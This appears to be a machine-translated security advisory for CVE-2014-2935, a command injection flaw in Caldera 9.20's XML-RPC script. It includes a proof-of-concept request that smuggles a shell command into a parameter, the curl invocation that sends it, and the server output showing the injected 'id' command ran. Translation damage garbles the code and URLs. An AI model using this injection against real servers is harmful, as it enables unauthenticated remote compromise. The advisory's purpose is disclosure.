Release date:
Updated on: 2014-05-10
Affected Systems:
Calera Caldera 9.20
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67252
CVE (CAN) ID: CVE-2014-2935
Caldera is a RIP software, color management software, and workflow software.
Caldera 9.20 and earlier versions do not correctly delete some elements used in the OS command, '/costview3/xmlrpc_server/xmlrpc. the php' script has a command execution vulnerability. A remote user without authentication can trigger this vulnerability by submitting a specially crafted php XMLRPC request, resulting in the execution of OS commands.
<* Source: Thomas Fischer
Markus Wulftange
Link: http://www.kb.cert.org/vuls/id/693092
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Example:
$ Cat get_cutter_tools.xml
<? Phpxml version = "1.0"?>
<MethodCall>
<MethodName> xmlrpc. get_cutter_tools_xmlrpc </methodName>
<Params>
<Param> <value> <string> cutter_name </string> </value> </param>
<Param> <value> <string>; echo
"& Lt; CalderaInfo> & lt; methods> & lt; item> & lt; type> 'id' & lt;/type> & lt;/item> & lt; /methods> & lt;/CalderaInfo
> "</String> </value> </param>
</Params>
</MethodCall>
$ Curl -- data @ get_cutter_tools.xml http: // <? Phpxml version = "1.0"?>
<MethodResponse>
<Params>
<Param>
<Value> <struct>
<Member> <name> get_cutter_tools_xmlrpc </name>
<Value> <array>
<Data>
<Value> <string> uid = 1002 (caldera) gid = 1001 (caldera)
Groups = 1001 (caldera), 4 (adm), 7 (lp), 20 (dialout), 24 (cdrom), 25 (floppy), 29 (audio ), 30 (dip), 46 (plugdev), 103
(Fuse), 104 (bytes), 109 (netdev) </string> </value>
</Data>
</Array> </value>
</Member>
</Struct> </value>
</Param>
</Params>
</MethodResponse>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Caldera
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.caldera.com/support/
Http://www.caldera.com/product/version-9-20/
Http://www.caldera.com/product/options/costview/
This article permanently updates the link address: